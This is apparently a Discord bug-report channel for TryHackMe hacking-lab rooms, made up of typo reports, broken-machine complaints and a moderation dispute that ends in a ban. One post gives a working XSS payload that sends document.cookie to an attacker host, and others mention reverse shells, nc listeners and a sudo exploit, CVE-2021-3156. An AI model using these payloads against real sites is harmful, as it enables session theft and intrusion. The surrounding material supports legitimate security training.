Scanning and Exploitation with Metasploit: https://tryhackme.com/room/metasploitexploitation

This links don't come up for me

this is written really poorly and confusingly: ```Kerberos Tickets Overview -

The main ticket that you will see is a ticket-granting ticket these can come in various forms such as a .kirbi for Rubeus .ccache for Impacket. The main ticket that you will see is a .kirbi ticket. A ticket is typically base64 encoded and can be used for various attacks. The ticket-granting ticket is only used with the KDC in order to get service tickets. Once you give the TGT the server then gets the User details, session key, and then encrypts the ticket with the service account NTLM hash. Your TGT then gives the encrypted timestamp, session key, and the encrypted TGT. The KDC will then authenticate the TGT and give back a service ticket for the requested service. A normal TGT will only work with that given service account that is connected to it however a KRBTGT allows you to get any service ticket that you want allowing you to access anything on the domain that you want.```

https://tryhackme.com/room/attackingkerberos

Maybe a suggested update? Thoughts

The main ticket that you will see is a ticket-granting ticket (TGT) these may come in a variety of forms such as a .kirbi for Rubeus or .ccache for Impacket. The main ticket that you will see is a .kirbi. A ticket is typically base64 encoded and can be utilised for various attacks. The TGT is only used with the Key Distribution Center (KDC) in order to get service tickets. Once you give the TGT to the server it will then get the Users details, session key, before encrypting the ticket with the service account NTLM hash. Your TGT then provides the encrypted timestamp, session key, and the encrypted TGT to the KDC which will then authenticate the TGT and give back a service ticket for the requested service. A normal TGT will only work with the connected service account. However, a KRBTGT allows you to get any service ticket allowing you access to anything on the domain.

better, but still misses some punctuation

I’ll take that as didn’t throw thru grammarly 😂

Room - Corp
Task 4
Hyperlink not available

https://tryhackme.com/room/osqueryf8

Task 5 Creating queries: question "What is the query to show the username field from the users table where the username is 3 characters long and ends with 'en'? " must 'em'

There is no use in the table ending with %en

Hey, I'm doing Advent of Cyber1 Day9. But I can't access 10.10.196.100:3000 is this normal?

thanks for reporting this. should be fixed now. url added: https://support.microsoft.com/en-us/topic/77504e1d-2b75-5be1-3eef-cec3617cc461

Gave +1 Rep to @spark apex

best to ask in #room-help

try _en

already tried that, there is no user who their name ended with ...en

change question OR change DB

gotcha. i'm seeing that now. i'll leave it up to @hazy hinge if he'd want to change the question so the query returns something.

Hi there, In the meterpreter room (https://tryhackme.com/room/meterpreter) a typo in the hint of Task 5 of the question "Where is the "secrets.txt" file located?" The hint say: "You can use any of these commands: search -f *.txt search -f secrets.txt.txt" (mention of double txt)

Not arguing that it's not a bug, but sometimes people do create files with the extension name duplicated. Especially on Windows which hides extensions by default.

You are maybe right, because the answer "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt" (what I found) is not accepted. Now waiting 5-10 minutes more to see if that double txt file is found. But then, the question is not clear: "Where is the "secrets.txt" file located?"

Got my answer already: No files matching your search were found.

Shoot: I should have removed the name of the secrets.txt (That's the answer: C:\Program Files (x86)\Windows Multimedia Platform)

So, I think it is a typo error

I’ve posted about this one like twice already and it was never noticed ¯_(ツ)_/¯

I strongly confirm there's a typo error and not only 1, but 2. As the question: "Where is the "realsecret.txt" file located?" the hint is (a copy paste actually of previous typo hint): "You can use any of these commands: search -f *.txt search -f secrets.txt.tx"

You will not find that file with the hint given

Bug in https://tryhackme.com/room/rpnessusredux# on below question.

What Apache HTTP Server Version is reported by Nessus?

Answer that marks question correct is 2.4.99

nessus output

URL : http://10.10.155.167/
Version : 2.4.99
backported : 1
os : ConvertedDebian

@burnt raven 2.4.99 and 2.4.99 are the same?

just realized there were two outputs for the http server type and version plugin

here's the other output
The remote web server type is :

Apache/2.4.25 (Debian)

all good now. thanks anyway

Gave +1 Rep to @eternal summit

You are correct. There isn't a user that will be returned but the question is simply asking you to submit the query based on the question. The question is not asking for an actual user/username.

still looks dead to me

Report from Reddit - Vulnversity having incorrect/not clear instructions
https://www.reddit.com/r/tryhackme/comments/pyc4d0/vulnversity_room_has_incorrect_instructions/

That's right

Hello everyone
I've got a problem with the network services room
I'm actually on task smb exploit and i have a problem with ssh login
I found the user name which is John and i downloaded his private ssh key on the smb server but when i'm trying to connect on the ssh server it tell me that the connection is bloqued
i augmented keys permissions by using chmod 600 id_rsa

Drop in to #room-help or #site-support

I found the user name which is John this is not quite right.

fixed. thanks for reporting 🙂

Gave +1 Rep to @ocean island

@twin tapir when you get a chance could you check this out please?

I understood my mistake
I never had this kind of message from smb so i was thinking it was a problem on the machine
Thanks for help 😉

Gave +1 Rep to @eternal summit

Hi guys , room look to glass have bug of login with correct password

Ssh jabberwocky@roomip -p 22

Am using correct password (bewareThejabberwock) but not login , please fix as soon , am using my pc and tryhackme kali machine as invalid login

Hey briskets, sorry I'm only seeing this. Really appreciate you doing that for me (:

@eternal summit man fix your room as soon please

Please be patient, it might be a user error.
Look for any case changes, did you verify that secret?

Yea

IIRC, the actual password is constructed as the combination of four random strings from a wordlist.
And the password is subject to change after multiple trials🤔

||bewareTheJabberwock|| isn't the password for SSH🙂

This right ? (bewareThejabberwock)

Verify it on the service from where you found it first

The one that says🤔
Enter secret:

Yea am correct port to appear massage and decrypt in (https://www.guballa.de/vigenere-solver)

Massage before decrypt is ('Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd)

Please verify massage to decrypt am correct or wrong

As a general rule: if lots of people have completed a room, and you can't find anyone else complaining, it is probably something you're doing.

Congratulations, you fell for a rabbithole that wasn't even a rabbithole.
That's not the password.

That box hasn't changed since it was released.

This also comes off as exceptionally impatient and rude.

This normal can happened with any one , why is rude ? My be you misunderstand , am only mention the issue with me to anyone help me for fixing , what is rude

Because you demanded that I fix an issue

And that I make it my priority

When you haven't checked writeups or done any of the background work to check if it's a bug

My be have issue , what problem of helping us to fixed if have issue

Because you do not get to decide what priority something is, it's incredibly rude to demand someone fixes something as soon as possible.

I don’t know , am asking for help

This is not a bug and I won't discuss it any further. Try harder. Use the appropriate help channels if you're stuck

Why you angry ? This normal room same as any room in the world , come down , this not war

-mute @boreal prism 20m Incredibly rude, demanding that a creator fixes their box when there's not a bug. Refusing to follow the standard help process.

🔇 Muted resteex0#7293 for 20 minutes

@eternal summit why you muted me ? , am paid money for tryhackme for service not rude from you to me , am asking for helping and you getting angry why ? I don’t know .? Cannot working with customers please dont rude with us

I want real someone from technical support of tryhackme

Hey @boreal prism
You requested someone from technical support? :)
What's your issue?

Yea , you manager in team here ?

I am technical support:)

If you manager here please read above , this nice for asking help from tryhackme someone from your team misunderstand and angry with shooting by replay rude to me , am paid money for service not rude

Hey!
I'm sorry you feel that way.
Discord moderators are volunteers, they are not TryHackMe employees.

Give me a moment to read your issue:)

Ok

Hey, so it looks like you're missing a capital letter on the password, have you tried "bewareTheJabberwock"

Oh, whoops, sorry that's wrong.

Before my original issue solving , how someone from tryhackme replay with rude , what am doing to do that ?

So, you were demanding that the room creator should fix their room.

It’s not acceptable behaviour to request someone to fix something, it comes across as rude.

He misunderstand , this not order this hope for helping , what problem of that

Ah, so, I see your issue.

The “password” you are using is actually the ||secret|| required to get the password.

The room isn’t broken at all:)
Have you checked the writeups on the room yet?

Check all

Because that am here for asking helping

You didn’t ask for help.

@hazy tiger Man if I created room and someone having issue with my room , not shooting with him

Look, you said

That’s very rude, especially as the room isn’t broken:)

What the meaning (please )?

Please read writeups on the room to fix your problem, or ask for help in the help chats #room-help

I don’t see any rude here

Am asking with please

@hazy tiger listen this you replay to solved issue ?

The room not sams as god but can same as bugs , this my right to asking for helping

@hazy tiger you not fix my issue here

Please let's take the topic forward and not dwell on the same segment, you might want to check the write-ups for the room, is what is advised. 🙂

@glad badger this not rude , but after that from your team is rude because am asking for help , and this not help , any room have bugs and you know that , why this guys angry ? I don’t know ? I see very simple issue , why all this of misunderstand

Please let's move on and see if your problem gets resolved by consulting the write-ups of the room. 🙂

I read all write ups and getting ssh password after decryption as above

But not valid login on my pc or machine of tryhackme

I spent one hour from my time to chatting bullshit , now am asking for help no clear technical answer to solving , someone not have meaning of word ( please ) and attack customers for nothing , customers enter here for looking solving issue but the replay out of the box , if real any one from tryhackme teams should be apologizing for me , this very deep disappointment of tryhackme teams here

Hey, please stop arguing as the room is not broken. The problem is user error; Read the existing writeups and figure out what you are doing wrong or I will ban you.

-mute @boreal prism 48h Incredibly rude to both a room creator and support staff. Continuing this behaviour after a 20min mute. Be polite, be respectful, and please stop when you're asked.
Your issue is entirely user error, and can be resolved easily by following the instructions provided to you but support staff.
If you continue being rude after this mute, you will be permanently banned.

🔇 Muted resteex0#7293 for 2 days

I think that this is more of a typo than a bug. I'm in the Metasploit room, task 2 Scanning. It says "Metasploit will scan port numbers from 1 to 1000" But when I open msfconsole and the module portscan/tcp it says "PORTS 1-10.000" by default and it also says 1-10.000 in the screenshot above the text in task 2 Scanning.

-ban @boreal prism Incredibly rude to staff, you can appeal via bans@tryhackme.com

🔨 Banned resteex0#7293 indefinitely

fix this. thanks

Gave +1 Rep to @tiny sun

nvm im stupid\

https://tenor.com/view/tracey-matney-cut-it-out-scissors-no-way-cut-gif-18893086

@vagrant light @idle plume I'm having what appears to be a serious issue on the final portion of Osiris. I just spent five hours on my livestream struggling with it. As I'm sure you remember, the final hurdle of this box involves rebuilding a DPAPI master key using the domain backup key on Ra. In the writeup, CQDPAPIBlobSearcher.exe is used and has the following output, screenshotted directly from the writeup:

This is a screenshot of running the same tool with the same arguments on Osiris, live right now:

notice that the "mkguid" in both is different. I believe this is the root of my issue.

The writeup asserts that mkguid "a773eede-71b6-4d66-b4b8-437e01749caa" is the correct Keepass one, and that guid is indeed present here that I can see but does not seem to be associated with anything.

Regardless, I have used CQMasterKeyAD.exe to rebuild BOTH master keys with both mkguids, and Keepass does not open.

Iive done this probably five or ssix times now. I've extracted the key from Ra using CQTools and using mimikatz. I've gone through this whole process multiple times and it does not work. Nothing ever works to get Keepass open.

I just walked through ALL of the steps in the walkthrough command by command copy/pasting where possible, and KEepass STILL does not open.

At this point I believe there is an issue with the machine. The mismatched mkguids seem to indicate that. Unless you have something I'm missing to point out?

hello, i am wondering if this is a bug: in overpass:

||i need to use port 80 to set up the reverse shell script as mentioned in the writeups, but port 80 is in use by websockify on the attackbox.||

why is this port in use on the attackbox? i feel like trying to reconfigure this would definitely break some proxying it's clearly using

i can't complete this on my locally virtualized parrot box either because the vpn isn't working according to the instructions 🥲

Hi. We did encounter exactly the same issue a couple of times a while ago, when doing a run-through. Reset the box and then it worked. Have no idea what makes this happen. The box-image is unchanged, so the problem cannot be there. It just seems to happen sometimes... Put as much as possible in the ducky-script. That way you will be at the right place only a couple of minutes, after a reset.

Yes I just reset it again and oddly enough, the guid was correct this time and I was able to access the Keepass vault. Thanks for confirming; felt like I was losing my mind there a bit. Have a great day!

Gave +1 Rep to @vagrant light

Great! Sorry I cannot tell you exactly what does this. Would really like to know myself too😄 Have a great day!

@vagrant light Nah I get it man, these are the eldritch dark magicks and you can only understand DPAPI so much ❤️

Network services 2, NFS, bug related to the bash file```./bash: error while loading shared libraries: libtinfo.so.6: cannot open shared object file: No such file or directory

I finally solved it using a sudo exploit

only CVE-2021-3156 worked for me

This might be because of incompatible binary
Did you copy the bash from your system?
Try to use one from GitHub if you haven't yet😉

Oh oops

welp I already got the room lol

It was honestly way more fun having to find a different exploit myself xD

#alfred There root flag is not in the "C:\Windows\System32\config" directory

#alfred in fact I am unable to locate it anywhere in the box

As the room says, you MUST migrate first

Otherwise Windows simply denies that the flag exists

That isn't a bug

it isnt?

im sorry

No, it's you not knowing alternatives to DNS 😄
(That's your hint btw)

hm

hmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm

https://tryhackme.com/room/owaspjuiceshop
Task 4, Question 2 ( @dusky junco )

Bug/ Issue:
Typo, it should be "James", not "Jame"

Incorrect Sentence:
"Believe it or not, the reset password mechanism can also be exploited! When inputted into the email field in the Forgot Password page, Jim's security question is set to "Your eldest siblings middle name?". In Task 2, we found that Jim might have something to do with Star Trek. Googling "Jim Star Trek" gives us a wiki page for Jame T. Kirk from Star Trek."

Correct Sentence:
"Believe it or not, the reset password mechanism can also be exploited! When inputted into the email field in the Forgot Password page, Jim's security question is set to "Your eldest siblings middle name?". In Task 2, we found that Jim might have something to do with Star Trek. Googling "Jim Star Trek" gives us a wiki page for James T. Kirk from Star Trek."

Screenshot:

https://tryhackme.com/room/thefindcommand
Task 3, Question 8 (@frail vigil)

Find all files that were not accessed in the last 10 days with extension ".png"
(emphasis mine)

I made a mistake:
||find / -type f -atime -10 -name "*.png"||
This would find files that were, in fact, accessed in the last 10 days, but it was marked as correct.

I reset the room and put in the correct answer, which was also accepted.
||find / -type f -atime +10 -name "*.png"||

It's a small thing, but I thought you'd want to know. Thank you!

Gave +1 Rep to @frail vigil

Having trouble with "Walking an application"

The question is what "What is the framework flag?" which I have found, and pasted it into the answer box. However it's saying that the answer is wrong. Just wondering if this has been happening to anyone else?

Thanks for the heads up, but that's actually not a bug: THM accepts some fault in your answer so that's why your answer got accepted (it was mostly right). And yes, as you can see if you refresh the room, you get the exact right answer.

Gave +1 Rep to @dawn iron

I think room: "Wgel CTF" might be bugged. I was able to get the ||id_rsa key|| and I'm trying to run ||"ssh -i ~/.ssh/id_rsa <login name>@<ip>"||.I am asked for a password still. I still have a lot to learn about hacking but I've checked a few walk-throughs and they seem to confirm I'm at the correct step. The users in the walkthrough also don't get asked for a password.

10.200.126.0/24 for holo is down 😦

tried waiting the time and restarting - no luck

Did you copy the key to your .ssh folder? Cuz if you didn't then your using the wrong filepath

anyone in holo .126 subnet mind voting reset for me

Needs 3/5 more I can only do it every hour

#room-bugs In learning Path Cyber Defense, Threat and Vulnerability Management, Course Intro in ISAC: the strings.exe worked only after copying the file in C:\Windows\System32

Lockdown room has bug that even if you leave admin password blank it will override

@vagrant light @idle plume Update on the Osiris issues I reported a few days ago: on stream today I was finally finishing up the box and I determined specifically what is changing the guid for the Keepass DPAPI blob. Running Keepass before re-building the Master Key is what ruins it; it seems that Keepass tries to access the correct master key, fails, and then sets a different GUID on its encrypted blob, perhaps so it can try accessing it with that key as a fallback?

I'm not sure why it does this, but I did confirm it using mimikatz' dpapi::cred command on the ProtectedUserKey.bin file just before trying to open Keepass (unsuccessfully, because Charlotte's password has changed) and then just after, and the guids were different.

I don't know why Keepass does this, but it seems this is what is requiring a box reset.

Yes.

Wgel CTF

Just confirming, the id_rsa in that folder is the one you copied?

Yeah. I was sure to mv my host generated id_rsa into a hidden folder out of that dir.

Ah ok. Just making sure. I haven't done that box yet, so I can't say for sure, but the id_rsa might require a password to use. The brother of a serial killer might be able to Crack it (don't wanna give away what to do if that is indeed the next step. You should get the reference, if not lmk)

Yeah I got it. I didn't think about that. Should have lol. I was just kinda stumped when the walkthrough snips didn't show the box asking for a pass.

Yea. Again, idk, could be that it is bugged. I haven't done it yet, but thats what I'd do next

lmk if you too run into an issue when you get to it.

Will do

Ahhh. Interesting. Thanks for clarifying what makes this happen! Btw. is your stream public? Would like to watch it😊

Gave +1 Rep to @river stone

Not exactly a bug just that the directories in linux2 aren't the same as the questions. Just input the answer for the ASCII text question from the video because the directories didn't match.

You are using the attackbox, not the target machine.

Ok, thank you for the research!

Gave +1 Rep to @river stone

@obsidian kiln Room bug in - https://tryhackme.com/room/uploadvulns - Task 8. Thought I'd share this - the PHP extensions listed in wikipedia have changed. They used to be: .php, .phtml, .php3, .php4, .php5, .php7, .phps, .php-s, .pht, .phar. But they've changed to be .php,.phar,.phtml,.pht,.phps. That means you need to research somewhere else to know about php extensions https://en.wikipedia.org/w/index.php?title=PHP&diff=prev&oldid=1021953529 and hence pass the task.

@obsidian kiln

Blugh

Thx for that.

Gotta take dog out, but will deal with that in a little bit

Ta for reporting 🙂

np

the final XSS task doesn't seem to work

It isn't sending the requests back

anyone managed it?

https://tryhackme.com/room/xssgi TASK 8: the given payload in the room fires for me but no admin reviews it and therefore you cannot complete.

Just want to confirm that Task 8 from XSSGI - acmeitsupportv10 seems bugged with the provided payload. I suggest looking online for another payload (or craft another with your h4ck3r skillz) 😉 Because it can work.

Did you attempt Method 1 or 2?

@glad badger I tried both and it did not work. I changed the xss payload and then it worked for method1

||<img src=x onerror=this.src="http://<machine-ip>/?c="+document.cookie>||

Can confirm above. was able to get a payload to trigger but method listed in room werent working. None the less still a great room.

@vagrant light It is! https://twitch.tv/alh4zr3d is the main page. The videos are here: https://www.twitch.tv/Alh4zr3d/videos. My Osiris run is spread over three separate streams; the first is this one: https://www.twitch.tv/videos/1160065874, the second is struggling with DPAPI and becoming frustrated: https://www.twitch.tv/videos/1163763875, and the third I just did yesterday and I finally finish it: https://www.twitch.tv/videos/1166580516

If you try method 1 using the AttackBox, it requires to specify the port number in the payload (and port 80 will not work, which netcat will complain about when setting up the listener). I've updated the task today to reflect that. 🙂

Cool! Looking forward to watching them😀

Hi everybody! Is there any problem in room Cross-site Scripting? After trying to enter a payload site becomes inaccessible as displayed on the browser "Unable to connect" ??

or I do something wrong ?

ok , it s working now. It was probably temporary

same here

same here

Room: sqlinjectionv2
URL: https://tryhackme.com/room/sqlinjectionlm
Bug: Task 6 asks for the flag from Level Two, but will not accept it.
Screenshots: https://imgur.com/a/vnSI2nv

https://tryhackme.com/room/sqlinjectionlm

Changing the query to "LIMIT 1,1" forces the query to skip the first result, and then "LIMIT 2,1" returns the second result and so on. You need to remember the first number tells the database how many results you wish to skip, and the second number tells the database how many rows to return.
If the first number says how many you want to skip, and the second being how many rows you want to return, then 1,1 would be (Skip 1, take 1) giving you the second (Correct) but 2,1 should be (Skip 2, take 1) giving you the third result - Not the second

Fixed. Changed to skips the first two results 🙂

The question mentions after completing level 2 🙂 So click on the blue Level 3 icon and you will see the flag. 🥳

I've updated the question to reflect this: What is the flag after completing level two? (and moving to level 3) 🙂 @uncut wagon

Doh! I just realized that after revisiting the room. But that does make it clearer now. Just finished the room. Very enjoyable. Thank you for the clarification and sorry for the facepalm moment. 🙂

Gave +1 Rep to @glad badger

Glad to hear you are enjoying them. 🙂

Cross-site Scripting problem appeared again; in Task 7; copy and paste the code in the key logger and put it in the stored XXS, web site goes down? any idea ?

Hello,
in uploadvulns room, websites don't work while I can connect to thm's servers without worries

Did you correctly add them to your hosts file?

What issue/error are you getting?

None, juste loading...

When I try ping, I don't receive any response

Hi, I am working on the room "walking an application". I found 2 flags more, but I can't find questions regarding to more flags. Is it intentional? Thanks.

hello, on Linux Fundamentals Part 1 task 5 third question "
What is the contents of this file?". the solution input accepted the last variable as 1 rather than !

yes, there are some that accept your input and mark it as correct answer even though you may have some typo @bleak beacon

Hello, the new honey-pot intro room has a broken question in Task6, question 1

When asking for the CPU type, it does not accept the output of lscpu or cat/proc/cpuinfo, although I see some similarity in the expected pattern of answer.

That's because tryhackme allows fir sleight variations sometimes

i think there is a bug in introduction to web hacking module. I didn't finish sqlinjection room but i received a badge for finishing introduction to web hacking module.

Did you finish the last module of the room?

last room in the module is sql injection.

Yea. Thats a known issue.

Does anyone know the user of "Polomints"? I'm hitting https://tryhackme.com/room/johntheripper0 Task 8 and the modifier "c - Capitalises the character positionally" should probably read "c capitalize" like the JTR wiki or "c - Capitalise the first letter"

im confused as to what youre asking

There's a line that's repeated in the room where the modifier 'c' is described twice.

The first time is "c - Capitalises the character positionally" which I think is a bit confusing.

and the second time "Capitalise the first letter - c" makes more sense.

It's only a typo, but I thought the place to report it was here.

Also, are custom rules called by --rule or --rules? looking briefly at the help line, I can't find --rule, but can find --rules.

its not a typo. c capitalizes a character based on the position that you place the c in. since the rule it lists is cAz... c is the first position do it will capitalize the first letter

--rule=RULENAME

so how do you capitalize other letters?

move the c to a different place in the rule lo

lol

actually, nvm. i went back to look and i think you are correct

pretty sure it should say capitalize the first letter both times

Thanks - know who we msg to change it?

idk, it might not be a bug lol. im reading through the rules syntax rn. hold on

ok, i dont believe its a bug. sorry lol. someone can correct me if im wrong but i believe if you were to do Azc it would take the word, add whatever characters you say and then capitalize the last letter. or something like cat

that*

i believe it is positional

Thx for checking it out.

owasp top 10 task 7 site not working

people have issues with masterminds room.

they expect ssh credentials to connect. and there is no explanation about how to connect to the box.
i saw similar rooms with vnc, split view pops up as soon as it's ready.

https://tryhackme.com/room/mastermindsxlq

split view pops up as soon as it's ready

That's what happen with Masterminds aswell

( at least, in my case )

a note was added at the beginning of the room for this

thanks.

Gave +1 Rep to @stuck stirrup

hii i am not able to suport the metasploit exploit name in nax challenge it is showing uncorrect anwser but it is correct i have exploited the same vuln to get a shell

Hello .. I am trying to solve the USTON machine. I have credentials for the SVC-Kerb user, but can't find a way to continue. I have seen that the MS-SQL port should be open, but no ... Is it possible that the machine is failing?

https://tryhackme.com/room/investigatingwindows3 the button start machine do not exist.

We're looking into this. 🙂

i have two bugs that i wanted to mention but scrolling up it seems im not the only one having issues with the xssgi staff cookie payload and also USTOUN not having sql running. Thank you THM Staff for your help, much appreciated

I was able to get the xssgi staff cookie to fire using the AttackBox but not through the openvpn but USTOUN is still a thorn in my side 🙂

This has been fixed. Thank you for reporting. 🙂

Gave +1 Rep to @steel talon

https://tryhackme.com/room/introtolan ( @dusky junco )
Task 3 (at the top)
Bug type: Grammatical Error

Incorrect sentence: the ARP protocol or Address Resolution Protocol for short
What it should be: the Address Resolution Protocol protocol or ARP for short

Screenshot:

you sure jabba 🤔

i wouldb suggest ygetting rid of the and prot9ocol

qait no chaning the sentence to the Addres Reaoltuon Protocl or ARP for ahort

sory for the typos

Room: Passive Reconnaissance
Task 6 Question 1 is confusing, perhaps Which country in the world has the second most apache servers?

Good point. The question has been updated to remove any ambiguity. Thank you. 🙂

Gave +1 Rep to @north gyro

Task 35 Wreath, I think it should be spelled as order

Linux Fundamentals Part 1
Task 4
Question 2

I started a Machine and used the AttackBox option.
Opening the terminal and using the command whoami, the returned user is root.
However the question expects the tryhackme user.

You should have a comma instead of a full stop.

Will fix today

You need to use SSH to log into the machine that you deploy in the room (not use the AttackBox terminal for your answers)

oh I was clicking the wrong button. Instead of clicking the "Start Machine" button I was clicking the "Start AttackBox"
Thank you!

Gave +1 Rep to @dusky junco

Room steelmountain , in Task 3; I got an error after PowerUp.ps1 script , any advice ?

https://tryhackme.com/room/marketplace
admin cookie not receiving
i can get mine
its been hours trying

the Yara room is pretty much broken, you cant correctly install the tool due to bugs and issues

Room link, task, screenshots, explanation

New Room: Net Sec Challenge. https://tryhackme.com/room/netsecchallenge
Is the chance of being detected supposed to increase while nothing is happening? You can just watch it increase to 100% without initiating a scan.

Yes that is intended, use the Reset Packet Count button prior to running a new nmap scan. 🙂

Thank you.

Regarding the netsecchallenge room

It seems it doesnt give points

@glad badger Is That Intended? I see point being Made in the room (30 points per answer) but they dont add up to my global score

The room is not officially released yet, so it gives no points (to your totals). 🙂

:(

@glad badger they'll eventually are up once released?

Or are they lost points if i do it Now?

Also, it seems i experience the same issue as @void vortex

No matter what the scan is or of i dont scan at all, the counter Will still go up no flag appears after the scan is complete

I was just going to wait until they created a discord room to discuss it there. It's apparently intended. I didn't mean to jump the gun on a room that wasn't released yet.

You have to experiment and run the right nmap scan. Go to the nmap reference guide and see which different port scanning techniques are possible.

And think about which scan "uses the least" when it comes to being identifiable when it sends probe packets. 😄

Ok, but the point is that the counter goes up even of i dont scan it , 1 minute is enough to go to 50%. It my scan takes more than 1 minute the counter would go over 50%

Ill try

Room steelmountain , in Task 3; I got an error after PowerUp.ps1 script , any advice ?
PS > . .\PowerUp.ps1

hello i am trying to solve a room called upload vulnerabilities, in the last i am needed to do client side filtering but when i click response to server it doesn't shows me the request the name of page is /assets/js/upload.js

instead its showing me this

pls ping me

hello i am trying to solve a room called upload vulnerabilities, in the last i am needed to do client side filtering but when i click response to server it doesn't shows me the request the name of page is /assets/js/upload.js
instead its showing me this

i have the same prob

i think the rooms is buged

@dusky junco

Script PowerUp.ps1 on the attacking machine is working: Path is under; /var/lib/docker/overlay2/51d6784e5fd41c0d48a613e2023e8400fd15a9d400c4e3724015f35bfbe782a6/diff/empire/data/module_source/privesc/PowerUp.ps1

Burp suite dosent intercept external Javascriot files by default. Theres a setting somewhere to enable it, I don't remember where tho

-warn @alpine spindle Stop copying user's messages and sending them again. It's spam.

⚠ Warned sensenboy#7203

Hi! The new user room Challenge on Network Services has a bug for me, where the % chance of being detected goes up while not running any scan whatsoever

I have confirmed this with another user

Or is stuck hard fast at 0% and doesn’t work (the button to rest count also doesn’t tripped a pop up) with my local VM(latest kali)

people have been able to complete the room. I'm unsure if the % going up is a "bug" specifically

although i have the issue of not being able to run a scan stealthy enough to not hit 100%

actually, i just ran the machine and got 68% instantly - no scans. maybe it is a bug

The windows10privesc machine is shutting down well before expiration, and the stopped machine isn't reflected in the UI. It's been frustrating me because i couldn't figure out what was happening, I saw the actual shutdown process this time though. The UI shows 56m 11s left and a machine IP - so I've been thinking i had an active machine and was experience network issues. when in reality the machine is shut down 😦

@dusky junco that one might need licensing

It is expired. I thought they only shutdown once every 24 hours though. Thanks for checking it.

In the room Sysinternals, Task 1, Question 1, I think the year is wrong per the wiki.

Ive reported this

linux fundamentals part 2, task 5 and task 6 have a couple screenshots / paragraphs in the wrong place

Thanks boss. (my bad lol.)

Gave +1 Rep to @gritty moth

Thanks boss.

Open up an attack box, but do not run any scans. Then open up a firefox and reset the packet count. Now watch the % creep up while you are not taking any offensive actions against it whatsoever.
The bug is real and at least 2 people besides me were able to confirm that. @obtuse musk @void vortex

Yeah that's why I was after some info on the IDS. It's scan scope obviously goes beyond just the packets sent in nmap scans.

Hello, I have a problem : Room Burpsuite, Task 9, last question i can't submit the answer : it says undefined

Room Alfred , I am on Task 1, whateever way I tried nothing worked on sudo nc -nlvp 4448 screen remains unchanged, I am able to see the script Invoke-PowerShellTcp.ps1 when I check the browser access as IP.. I use └─$ /home/kali/.local/bin/updog -p 80 for my web server. I got stuck , any advice will be appreciated !

I suspect the script Invoke-PowerShellTcp.ps1

?

What your asking is not very clear. Could you please clarify what you're stuck on?

Screen shots will also help us to figure it out quicker

Also this should really be in #room-help unless you're certain it's a bug.

Oops Lol. I wasn't paying attention to the room

gatekeeper isnt working

i cant connect to the service with python and i need add -nv to connect with nc

https://netsec.ws/?p=292 I mean this says use -nv

i cant connect with gatekeeper service with my python script

is not my firsts buffer overflow room and i didnt got any problem

Redline VMs are missing the IOCs were supposed to find

there is a bug in the room tmuxremux in task 5 (bug: question has been repeated)

FFUF: is missing the favicon.ico on my try last night. not sure if this is known

also the about.php is missing as well. room seems to be broken

room: https://tryhackme.com/room/contentdiscovery
task: 1

wasn't => weren't

room: https://tryhackme.com/room/authenticationbypass
task: 5

MACHINE_IP not being replaced with the machine ip

That doesn't work in terminal blocks by default

There's a trick to it though 😁

FFUF first machine is def broken...

Sysmon room - Task 6 - Hunting-LSASS.evtx is missing from the Practice folder.

Hey guys, Im stuck on a room called internal, and im not sure if this is bug or anything, but what i have tried to do was to login to the wordpress and then this happens to it (The username and password are correct)

When you click the password you will be redirected to this domain:

http://www.internal.thm/blog/wp-login.php/

I assume you didn't read the task information?

i did tho, and i saw the writeups for this room because i was stuck on this, they all did what i did tho but for some reason i cant access the website

what do you suggest i should do?

Read the task information

ohh right got it! thanks tho!

Np

Pardon?

rip hackback events

pickle rick writeup on wrong room

nevermind, task 17 is pickle rick

Uh huh

bof1 room has some typos and errors that make a complex topic even more annoying to start in :/ and as a result, the actual correct answer for task 4 is considered wrong because the author didn't proofread.

Django room: Website won't load and ssh is timing out. restarting the machine won't help. vpn connection is working.

Hi, this isn't a direct Bug, but is it possible that the red marked part should say "How to test for Stored XSS"?

this is not a big deal but theres missing a " } " from a task 5, test 4, on https://tryhackme.com/room/linuxfundamentalspart3

fixed this. thanks jake 🙂

Gave +1 Rep to @sonic willow

fix this. thanks for reporting 🙂

room: https://tryhackme.com/room/powershell

task 6: scripting

The answer is actually wrong - there are 11 ports 130-140 inclusive, the answer is not actually 11.

Room https://tryhackme.com/room/rrootme
Probably a non issue, but in /var/www/html there is a website.zip file which is a replica of the website, in the panel folder and in index.php there is an old flag from hackIT in there

In NetworkServices Room, Task-6 Telnet Deployed machine doesn't give any ports as open!
I m using nmap <ipaddress>

Room: https://tryhackme.com/room/kuberneteschalltdi2020

Even after several restarts I cannot connect to the Kubernetes cluster (e.g. "The connection to the server 10.10.224.50:6443 was refused"). I can ping the server but port 6443 is never open. Am I doing something wrong or is there a technical issue?

same for me